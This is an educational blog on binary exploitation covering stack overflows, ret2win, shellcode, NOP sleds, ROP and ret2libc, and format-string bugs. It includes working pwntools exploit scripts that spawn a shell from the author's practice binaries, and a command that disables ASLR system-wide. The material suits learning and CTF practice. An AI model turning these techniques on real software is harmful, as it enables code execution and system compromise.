1 of 100

Cybersecurity Notes

Welcome to my blog! There's a lot here and it's a bit spread out, so here's a guide:

If you're looking for the binary exploitation notes, you're in the right place! Here I make notes on most of the things I learn, and also provide vulnerable binaries to allow you to have a go yourself. Most "common" stack techniques are mentioned along with some super introductory heap; more will come soon™.
If you're looking for my maths notes, they are split up (with some overlap):
- Cryptography-specific maths can be found on GitBook , or by clicking the hyperlink in the header
- All my other maths notes can be found on Notion . I realise having it in multiple locations is annoying, but maths support in Notion is just wayyy better. Like so much better. Sorry.
- Hopefully these two get moulded into one soon

If you'd like to find me elsewhere, I'm usually down as ir0nstone. The accounts you'd actually be interested in seeing are likely or my (or X, if you really prefer).

If this resource has been helpful to you, please consider :)

And, of course, thanks to GitBook for all of their support :)

~ Andrej Ljubic

Binary Exploitation

Stack

Introduction

An introduction to binary exploitation

Binary Exploitation is about finding vulnerabilities in programs and utilising them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.

When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.

Analysis

The binary has two files - source.c and vuln; the latter is an ELF file, which is the executable format for Linux (it is recommended to follow along with this with a Virtual Machine of your own, preferably Linux).

We're gonna use a tool called radare2 to analyse the behaviour of the binary when functions are called.

$ r2 -d -A vuln

The -d runs it while the -A performs analysis. We can disassemble main with

s main; pdf

s main seeks (moves) to main, while pdf stands for Print Disassembly Function (literally just disassembles it).

0x080491ab      55             push ebp
0x080491ac      89e5           mov ebp, esp
0x080491ae      83e4f0         and esp, 0xfffffff0
0x080491b1      e80d000000     call sym.__x86.get_pc_thunk.ax
0x080491b6      054a2e0000     add eax, 0x2e4a
0x080491bb      e8b2ffffff     call sym.unsafe
0x080491c0      90             nop
0x080491c1      c9             leave
0x080491c2      c3             ret

The call to unsafe is at 0x080491bb, so let's break there.

db 0x080491bb

db stands for debug breakpoint, and just sets a breakpoint. A breakpoint is simply somewhere which, when reached, pauses the program for you to run other commands. Now we run dc for debug continue; this just carries on running the file.

It should break before unsafe is called; let's analyse the top of the stack now:

[0x08049172]> pxw @ esp
0xff984af0 0xf7efe000         [...]

pxw tells r2 to analyse the hex as words, that is, 32-bit values. I only show the first value here, which is 0xf7efe000. This value is stored at the top of the stack, as ESP points to the top of the stack - in this case, that is 0xff984af0.

Note that the value 0xf7efe000 is random - it's an artefact of previous processes that have used that part of the stack. The stack is never wiped, it's just marked as usable, so before data actually gets put there the value is completely dependent on your system.

Let's move one more instruction with ds, debug step, and check the stack again. This will execute the call sym.unsafe instruction.

[0x08049172]> pxw @ esp
0xff984aec  0x080491c0 0xf7efe000 [...]

Huh, something's been pushed onto the top of the stack - the value 0x080491c0. This looks like it's in the binary - but where? Let's look back at the disassembly from before:

[...]
0x080491b6      054a2e0000     add eax, 0x2e4a
0x080491bb      e8b2ffffff     call sym.unsafe
0x080491c0      90             nop
[...]

We can see that 0x080491c0 is the memory address of the instruction after the call to unsafe. Why? This is how the program knows where to return to after unsafe() has finished.

Weaknesses

But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe and break on the ret instruction; ret is the equivalent of pop eip, which will get the saved return pointer we just analysed on the stack into the eip register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.

[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec.

[0x080491aa]> pxw @ 0xff984aec
0xff984aec  0x41414141 0x41414141 0x41414141 0x41414141  AAAAAAAAAAAAAAAA

Huh?

It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret, the value popped into eip won't be in the previous function but rather 0x41414141. Let's check with ds.

[0x080491aa]> ds
[0x41414141]>

And look at the new prompt - 0x41414141. Let's run dr eip to make sure that's the value in eip:

[0x41414141]> dr eip
0x41414141

Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc.

[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0

radare2 is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault, which could mean a variety of things, but usually that you have overwritten EIP.

Of course, you can prevent people from writing more characters than expected when making your program, usually using other C functions such as fgets(); gets() is intrinsically unsafe because it doesn't check the length of the input, meaning that the presence of gets() is always something you should check out in a program. It is also possible to give fgets() the wrong parameters, meaning it still takes in too many characters.

Summary

When a function calls another function, it

pushes a return pointer to the stack so the called function knows where to return
when the called function finishes execution, it pops it off the stack again

Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets() can prevent such easy overflow, but you should check how much is actually being read.

ret2win

The most basic binexp challenge

A ret2win is simply a binary where there is a win() function (or equivalent); once you successfully redirect execution there, you complete the challenge.

To carry this out, we have to leverage what we learnt in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.

To do this, what do we need to know? Well, a couple things:

The padding until we begin to overwrite the return pointer (EIP)
What value we want to overwrite EIP to

When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.

Finding the Padding

This can be found using simple trial and error; if we send a variable numbers of characters, we can use the Segmentation Fault message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.

You may get a segmentation fault for reasons other than overwriting EIP; use a debugger to make sure the padding is correct.

We get an offset of 52 bytes.

Finding the Address

Now we need to find the address of the flag() function in the binary. This is simple.

$ r2 -d -A vuln
$ afl
[...]
0x080491c3    1 43           sym.flag
[...]

afl stands for Analyse Functions List

The flag() function is at 0x080491c3.

Using the Information

The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the As that we sent became 0x41 - which is the ASCII code of A. So the solution is simple - let's just find the characters with ascii codes 0x08, 0x04, 0x91 and 0xc3.

This is a lot simpler than you might think, because we can specify them in python as hex:

address = '\x08\x04\x91\xc3'

And that makes it much easier.

Putting it Together

Now we know the padding and the value, let's exploit the binary! We can use pwntools to interface with the binary (check out the pwntools posts for a more in-depth look).

from pwn import *        # This is how we import pwntools

p = process('./vuln')    # We're starting a new process

payload = 'A' * 52
payload += '\x08\x04\x91\xc3'

p.clean()                # Receive all the text

p.sendline(payload)

log.info(p.clean())      # Output the "Exploited!" string to know we succeeded

If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put in a pause() to give us time to attach radare2 onto the process.

from pwn import *

p = process('./vuln')

payload = b'A' * 52
payload += '\x08\x04\x91\xc3'

log.info(p.clean())

pause()        # add this in

p.sendline(payload)

log.info(p.clean())

Now let's run the script with python3 exploit.py and then open up a new terminal window.

r2 -d -A $(pidof vuln)

By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe() and read the value of the return pointer.

[0x08049172]> db 0x080491aa
[0x08049172]> dc

<< press any button on the exploit terminal window >>

hit breakpoint at: 80491aa
[0x080491aa]> pxw @ esp
0xffdb0f7c  0xc3910408 [...]
[...]

0xc3910408 - look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is endianness. Big-endian systems store the most significant byte (the byte with the largest value) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (for a reason), and most binaries you will come across are little-endian. As far as we're concerned, the byte are stored in reverse order in little-endian executables.

Finding the Endianness

radare2 comes with a nice tool called rabin2 for binary analysis:

$ rabin2 -I vuln
[...]
endian   little
[...]

So our binary is little-endian.

Accounting for Endianness

The fix is simple - reverse the address (you can also remove the pause())

payload += '\x08\x04\x91\xc3'[::-1]

If you run this now, it will work:

$ python3 tutorial.py 
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!

And wham, you've called the flag() function! Congrats!

Pwntools and Endianness

Unsurprisingly, you're not the first person to have thought "could they possibly make endianness simpler" - luckily, pwntools has a built-in p32() function ready for use!

payload += '\x08\x04\x91\xc3'[::-1]

becomes

payload += p32(0x080491c3)

Much simpler, right?

The only caveat is that it returns bytes rather than a string, so you have to make the padding a byte string:

payload = b'A' * 52        # Notice the "b"

Otherwise you will get a

TypeError: can only concatenate str (not "bytes") to str

Final Exploit

from pwn import *            # This is how we import pwntools

p = process('./vuln')        # We're starting a new process

payload = b'A' * 52
payload += p32(0x080491c3)   # Use pwntools to pack it

log.info(p.clean())          # Receive all the text
p.sendline(payload)

log.info(p.clean())          # Output the "Exploited!" string to know we succeeded

De Bruijn Sequences

The better way to calculate offsets

De Bruijn sequences of order n is simply a sequence where no string of n characters is repeated. This makes finding the offset until EIP much simpler - we can just pass in a De Bruijn sequence, get the value within EIP and find the one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.

Generating the Pattern

Again, radare2 comes with a nice command-line tool (called ragg2) that can generate it for us. Let's create a sequence of length 100.

$ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh

The -P specifies the length while -r tells it to show ascii bytes rather than hex pairs.

Using the Pattern

Now we have the pattern, let's just input it in radare2 when prompted for input, make it crash and then calculate how far along the sequence the EIP is. Simples.

$ r2 -d -A vuln

[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0

The address it crashes on is 0x41534141; we can use radare2's in-built wopO command to work out the offset.

[0x41534141]> wopO 0x41534141
52

Awesome - we get the correct value!

We can also be lazy and not copy the value.

[0x41534141]> wopO `dr eip`
52

The backticks means the dr eip is calculated first, before the wopO is run on the result of it.

Shellcode

Running your own code

In real exploits, it's not particularly likely that you will have a win() function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.

Shellcode is essentially assembly instructions, except we input them into the binary; once we input it, we overwrite the return pointer to hijack code execution and point at our own instructions!

I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.

The reason shellcode is successful is that Von Neumann architecture (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.

Disabling ASLR

ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomising certain aspects of memory (we will talk about it in much more detail later). This randomisation can make shellcode exploits like the one we're about to do more less reliable, so we'll be disabling it for now using this.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Again, you should never run commands if you don't know what they do

Finding the Buffer in Memory

Let's debug vuln() using radare2 and work out where in memory the buffer starts; this is where we want to point the return pointer to.

$ r2 -d -A vuln

[0xf7fd40b0]> s sym.unsafe ; pdf
[...]
; var int32_t var_134h @ ebp-0x134
[...]

This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets() and find the exact address.

[0x08049172]> dc
Overflow me
<<Found me>>                    <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0xffffcfb4  3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7  <<Found me>>....

[...]

It appears to be at 0xffffcfd4; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).

Finding the Padding

Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous blog post.

$ ragg2 -P 400 -r
<copy this>

$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312

The padding is 312 bytes.

Putting it all together

In order for the shellcode to be correct, we're going to set context.binary to our binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us with working shellcode.

from pwn import *

context.binary = ELF('./vuln')

p = process()

We can use just process() because once context.binary is set it is assumed to use that process

Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.

payload = asm(shellcraft.sh())          # The shellcode
payload = payload.ljust(312, b'A')      # Padding
payload += p32(0xffffcfb4)              # Address of the Shellcode

Yup, that's it. Now let's send it off and use p.interactive(), which enables us to communicate to the shell.

log.info(p.clean())

p.sendline(payload)

p.interactive()

If you're getting an EOFError, print out the shellcode and try to find it in memory - the stack address may be wrong

$ python3 exploit.py
[*] 'vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py  source.c  vuln

And it works! Awesome.

Final Exploit

from pwn import *

context.binary = ELF('./vuln')

p = process()

payload = asm(shellcraft.sh())          # The shellcode
payload = payload.ljust(312, b'A')      # Padding
payload += p32(0xffffcfb4)              # Address of the Shellcode

log.info(p.clean())

p.sendline(payload)

p.interactive()

Summary

We injected shellcode, a series of assembly instructions, when prompted for input
We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
Once the return pointer got popped into EIP, it pointed at our shellcode
This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution

NOPs

More reliable shellcode exploits

NOP (no operation) instructions do exactly what they sound like: nothing. Which makes then very useful for shellcode exploits, because all they will do is run the next instruction. If we pad our exploits on the left with NOPs and point EIP at the middle of them, it'll simply keep doing no instructions until it reaches our actual shellcode. This allows us a greater margin of error as a shift of a few bytes forward or backwards won't really affect it, it'll just run a different number of NOP instructions - which have the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled, since the EIP is essentially sliding down them.

In intel x86 assembly, NOP instructions are \x90.

The NOP instruction actually used to stand for XCHG EAX, EAX, which does effectively nothing. You can read a bit more about it .

Updating our Shellcode Exploit

We can make slight changes to our exploit to do two things:

Add a large number of NOPs on the left
Adjust our return pointer to point at the middle of the NOPs rather than the buffer start

Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location my be different.

It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors padding with NOPs but the shellcode worked before, try reducing the length of the nopsled as it may be tampering with other things on the stack

Note that NOPs are only \x90 in certain architectures, and if you need others you can use pwntools:

32- vs 64-bit

The differences between the sizes

Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is switch out the p32() for p64() as the memory addresses are longer.

The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8 and R9 respectively as per the calling convention. Note that different Operating Systems also have different calling conventions.

No eXecute

The defence against shellcode

As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralising shellcode.

To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.

The Windows version of NX is DEP, which stands for Data Execution Prevention

Checking for NX

You can either use pwntools' checksec or rabin2.

$ checksec vuln
[*] 'vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

$ rabin2 -I vuln
[...]
nx       false
[...]

Return-Oriented Programming

Bypassing NX

The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way to do what you wish. This often involves passing parameters to functions already present within libc, such as system - if you can find the location of a command, such as cat flag.txt, and then pass it as a parameter to system, it will execute that command and return the output. A more dangerous command is /bin/sh, which when run by system gives the attacker a shell much like the shellcode we used did.

Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.

Calling Conventions

A more in-depth look into parameters for 32-bit and 64-bit programs

One Parameter

Source

Let's have a quick look at the source:

#include <stdio.h>

void vuln(int check) {
    if(check == 0xdeadbeef) {
        puts("Nice!");
    } else {
        puts("Not nice!");
    }
}

int main() {
    vuln(0xdeadbeef);
    vuln(0xdeadc0de);
}

Pretty simple.

If we run the 32-bit and 64-bit versions, we get the same output:

Nice!
Not nice!

Just what we expected.

Analysing 32-bit

Let's open the binary up in radare2 and disassemble it.

$ r2 -d -A vuln-32
$ s main; pdf

0x080491ac      8d4c2404       lea ecx, [argv]
0x080491b0      83e4f0         and esp, 0xfffffff0
0x080491b3      ff71fc         push dword [ecx - 4]
0x080491b6      55             push ebp
0x080491b7      89e5           mov ebp, esp
0x080491b9      51             push ecx
0x080491ba      83ec04         sub esp, 4
0x080491bd      e832000000     call sym.__x86.get_pc_thunk.ax
0x080491c2      053e2e0000     add eax, 0x2e3e
0x080491c7      83ec0c         sub esp, 0xc
0x080491ca      68efbeadde     push 0xdeadbeef
0x080491cf      e88effffff     call sym.vuln
0x080491d4      83c410         add esp, 0x10
0x080491d7      83ec0c         sub esp, 0xc
0x080491da      68dec0adde     push 0xdeadc0de
0x080491df      e87effffff     call sym.vuln
0x080491e4      83c410         add esp, 0x10
0x080491e7      b800000000     mov eax, 0
0x080491ec      8b4dfc         mov ecx, dword [var_4h]
0x080491ef      c9             leave
0x080491f0      8d61fc         lea esp, [ecx - 4]
0x080491f3      c3             ret

If we look closely at the calls to sym.vuln, we see a pattern:

push 0xdeadbeef
call sym.vuln
[...]
push 0xdeadc0de
call sym.vuln

We literally push the parameter to the stack before calling the function. Let's break on sym.vuln.

[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c      0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c

The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call, so it should be at the top of the stack. Now let's disassemble sym.vuln.

┌ 74: sym.vuln (int32_t arg_8h);
│           ; var int32_t var_4h @ ebp-0x4
│           ; arg int32_t arg_8h @ ebp+0x8
│           0x08049162 b    55             push ebp
│           0x08049163      89e5           mov ebp, esp
│           0x08049165      53             push ebx
│           0x08049166      83ec04         sub esp, 4
│           0x08049169      e886000000     call sym.__x86.get_pc_thunk.ax
│           0x0804916e      05922e0000     add eax, 0x2e92
│           0x08049173      817d08efbead.  cmp dword [arg_8h], 0xdeadbeef
│       ┌─< 0x0804917a      7516           jne 0x8049192
│       │   0x0804917c      83ec0c         sub esp, 0xc
│       │   0x0804917f      8d9008e0ffff   lea edx, [eax - 0x1ff8]
│       │   0x08049185      52             push edx
│       │   0x08049186      89c3           mov ebx, eax
│       │   0x08049188      e8a3feffff     call sym.imp.puts           ; int puts(const char *s)
│       │   0x0804918d      83c410         add esp, 0x10
│      ┌──< 0x08049190      eb14           jmp 0x80491a6
│      │└─> 0x08049192      83ec0c         sub esp, 0xc
│      │    0x08049195      8d900ee0ffff   lea edx, [eax - 0x1ff2]
│      │    0x0804919b      52             push edx
│      │    0x0804919c      89c3           mov ebx, eax
│      │    0x0804919e      e88dfeffff     call sym.imp.puts           ; int puts(const char *s)
│      │    0x080491a3      83c410         add esp, 0x10
│      │    ; CODE XREF from sym.vuln @ 0x8049190
│      └──> 0x080491a6      90             nop
│           0x080491a7      8b5dfc         mov ebx, dword [var_4h]
│           0x080491aa      c9             leave
└           0x080491ab      c3             ret

Here I'm showing the full output of the command because a lot of it is relevant. radare2 does a great job of detecting local variables - as you can see at the top, there is one called arg_8h. Later this same one is compared to 0xdeadbeef:

cmp dword [arg_8h], 0xdeadbeef

Clearly that's our parameter.

So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like:

return address        param_1

Analysing 64-bit

Let's disassemble main again here.

0x00401153      55             push rbp
0x00401154      4889e5         mov rbp, rsp
0x00401157      bfefbeadde     mov edi, 0xdeadbeef
0x0040115c      e8c1ffffff     call sym.vuln
0x00401161      bfdec0adde     mov edi, 0xdeadc0de
0x00401166      e8b7ffffff     call sym.vuln
0x0040116b      b800000000     mov eax, 0
0x00401170      5d             pop rbp
0x00401171      c3             ret

Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi (in the disassembly here it's edi, but edi is just the lower 32 bits of rdi, and the parameter is only 32 bits long, so it says EDI instead). If we break on sym.vuln again we can check rdi with the command

dr rdi

Just dr will display all registers

[0x00401153]> db sym.vuln 
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi
0xdeadbeef

Awesome.

Registers are used for parameters, but the return address is still pushed onto the stack and in ROP is placed right after the function address

Multiple Parameters

Source

#include <stdio.h>

void vuln(int check, int check2, int check3) {
    if(check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xc0ded00d) {
        puts("Nice!");
    } else {
        puts("Not nice!");
    }
}

int main() {
    vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
    vuln(0xdeadc0de, 0x12345678, 0xabcdef10);
}

32-bit

We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.

0x080491dd      680dd0dec0     push 0xc0ded00d
0x080491e2      68dec0adde     push 0xdeadc0de
0x080491e7      68efbeadde     push 0xdeadbeef
0x080491ec      e871ffffff     call sym.vuln
[...]
0x080491f7      6810efcdab     push 0xabcdef10
0x080491fc      6878563412     push 0x12345678
0x08049201      68dec0adde     push 0xdeadc0de
0x08049206      e857ffffff     call sym.vuln

It's just as simple - push them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln and print out the stack.

[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc      0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d

So it becomes quite clear how more parameters are placed on the stack:

return pointer        param1        param2        param3        [...]        paramN

64-bit

0x00401170      ba0dd0dec0     mov edx, 0xc0ded00d
0x00401175      bedec0adde     mov esi, 0xdeadc0de
0x0040117a      bfefbeadde     mov edi, 0xdeadbeef
0x0040117f      e89effffff     call sym.vuln
0x00401184      ba10efcdab     mov edx, 0xabcdef10
0x00401189      be78563412     mov esi, 0x12345678
0x0040118e      bfdec0adde     mov edi, 0xdeadc0de
0x00401193      e88affffff     call sym.vuln

So as well as rdi, we also push to rdx and rsi (or, in this case, their lower 32 bits).

Bigger 64-bit values

Just to show that it is in fact ultimately rdi and not edi that is used, I will alter the original one-parameter code to utilise a bigger number:

#include <stdio.h>

void vuln(long check) {
    if(check == 0xdeadbeefc0dedd00d) {
        puts("Nice!");
    }
}

int main() {
    vuln(0xdeadbeefc0dedd00d);
}

If you disassemble main, you can see it disassembles to

movabs rdi, 0xdeadbeefc0ded00d
call sym.vuln

movabs can be used to encode the mov instruction for 64-bit instructions - treat it as if it's a mov.

Gadgets

Controlling execution with snippets of code

Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret. We can manipulate the ret of these gadgets in such a way as to string together a large chain of them to do what we want.

Example

Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret gadget.

What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the stack during the pop rdi. Once the pop occurs, rsp moves:

And since ret is equivalent to pop rip, 0x5655576724 gets moved into rip. Note how the stack is laid out for this.

Utilising Gadgets

When we overwrite the return pointer, we overwrite the value pointed at by rsp. Once that value is popped, it points at the next value at the stack - but wait. We can overwrite the next value in the stack.

Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop 0x100 into rdi then jump to flag(). Let's step-by-step the execution.

On the original ret, which we overwrite the return pointer for, we pop the gadget address in. Now rip moves to point to the gadget, and rsp moves to the next memory address.

rsp moves to the 0x100; rip to the pop rdi. Now when we pop, 0x100 gets moved into rdi.

RSP moves onto the next items on the stack, the address of flag(). The ret is executed and flag() is called.

Summary

Essentially, if the gadget pops values from the stack, simply place those values afterwards (including the pop rip in ret). If we want to pop 0x10 into rdi and then jump to 0x16, our payload would look like this:

Note if you have multiple pop instructions, you can just add more values.

We use rdi as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.

Finding Gadgets

We can use the tool to find possible gadgets.

Combine it with grep to look for specific registers.

Exploiting Calling Conventions

Utilising Calling Conventions

32-bit

The program expects the stack to be laid out like this before executing the function:

So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.

Everything after the address of flag() will be part of the stack frame for the next function as it is expected to be there - just instead of using push instructions we just overwrote them manually.

from pwn import *

p = process('./vuln-32')

payload = b'A' * 52            # Padding up to EIP
payload += p32(0x080491c7)     # Address of flag()
payload += p32(0x0)            # Return address - don't care if crashes when done
payload += p32(0xdeadc0de)     # First parameter
payload += p32(0xc0ded00d)     # Second parameter

log.info(p.clean())
p.sendline(payload)
log.info(p.clean())

64-bit

Same logic, except we have to utilise the gadgets we talked about previously to fill the required registers (in this case rdi and rsi as we have two parameters).

We have to fill the registers before the function is called

from pwn import *

p = process('./vuln-64')

POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9


payload = b'A' * 56            # Padding
payload += p64(POP_RDI)        # pop rdi; ret
payload += p64(0xdeadc0de)     # value into rdi -> first param
payload += p64(POP_RSI_R15)    # pop rsi; pop r15; ret
payload += p64(0xc0ded00d)     # value into rsi -> first param
payload += p64(0x0)            # value into r15 -> not important
payload += p64(0x40116f)       # Address of flag()
payload += p64(0x0)

log.info(p.clean())
p.sendline(payload)
log.info(p.clean())

ret2libc

The standard ROP exploit

A ret2libc is based off the system function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string /bin/sh; if you pass this string to system, it will pop a shell.

And that is the entire basis of it - passing /bin/sh as a parameter to system. Doesn't sound too bad, right?

Disabling ASLR

To start with, we are going to disable ASLR. ASLR randomises the location of libc in memory, meaning we cannot (without other steps) work out the location of system and /bin/sh. To understand the general theory, we will start with it disabled.

Manual Exploitation

Getting Libc and its base

Fortunately Linux has a command called ldd for dynamic linking. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.

We need libc.so.6, so the base address of libc is 0xf7dc2000.

Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.

Getting the location of system()

To call system, we obviously need its location in memory. We can use the readelf command for this.

The -s flag tells readelf to search for symbols, for example functions. Here we can find the offset of system from libc base is 0x44f00.

Getting the location of /bin/sh

Since /bin/sh is just a string, we can use strings on the dynamic library we just found with ldd. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.

-a tells it to scan the entire file; -t x tells it to output the offset in hex.

32-bit Exploit

64-bit Exploit

Repeat the process with the libc linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6).

Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret gadget to put it into the RDI register.

Automating with Pwntools

Unsurprisingly, pwntools has a bunch of features that make this much simpler.

The 64-bit looks essentially the same.

Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.

Stack Alignment

A minor issue

A small issue you may get when pwning on 64-bit systems is that your exploit works perfectly locally but fails remotely - or even fails when you try to use the provided LIBC version rather than your local one. This arises due to something called stack alignment.

Essentially the . LIBC takes advantage of this and uses to optimise execution; system in particular utilises instructions such as movaps.

That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 - the ROP chain will fail on system.

The fix is simple - in your ROP chain, before the call to system, place a singular ret gadget:

This works because it will cause RSP to be popped an additional time, pushing it forward by 8 bytes and aligning it.

Format String Bug

Reading memory off the stack

Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.

Why it exists

In C, certain functions can take "format specifier" within strings. Let's look at an example:

int value = 1205;

printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);

This prints out:

Decimal: 1205
Float: 1205.000000
Hex: 0x4b5

So, it replaced %d with the value, %f with the float value and %x with the hex representation.

This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try print out the same value in hex 3 times:

int value = 1205;

printf("%x %x %x", value, value, value);

As expected, we get

4b5 4b5 4b5

What happens, however, if we don't have enough arguments for all the format specifiers?

int value = 1205;

printf("%x %x %x", value);

4b5 5659b000 565981b0

Erm... what happened here?

The key here is that printf expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.

How to abuse this

Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is when C code takes user-provided input and prints it out using printf.

#include <stdio.h>

int main(void) {
    char buffer[30];
    
    gets(buffer);

    printf(buffer);
    return 0;
}

If we run this normally, it works at expected:

$ ./test 

yes
yes

But what happens if we input format string specifieres, such as %x?

$ ./test

%x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520

It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.

Choosing Offsets

To print the same value 3 times, using

printf("%x %x %x", value, value, value);

Gets tedious - so, there is a better way in C.

printf("%1$x %1$x %1$x", value);

The 1$ between tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p - instead of sending %p %p %p %p %p %p we can just do %6$p. This allows us to be much more efficient.

Arbitrary Reads

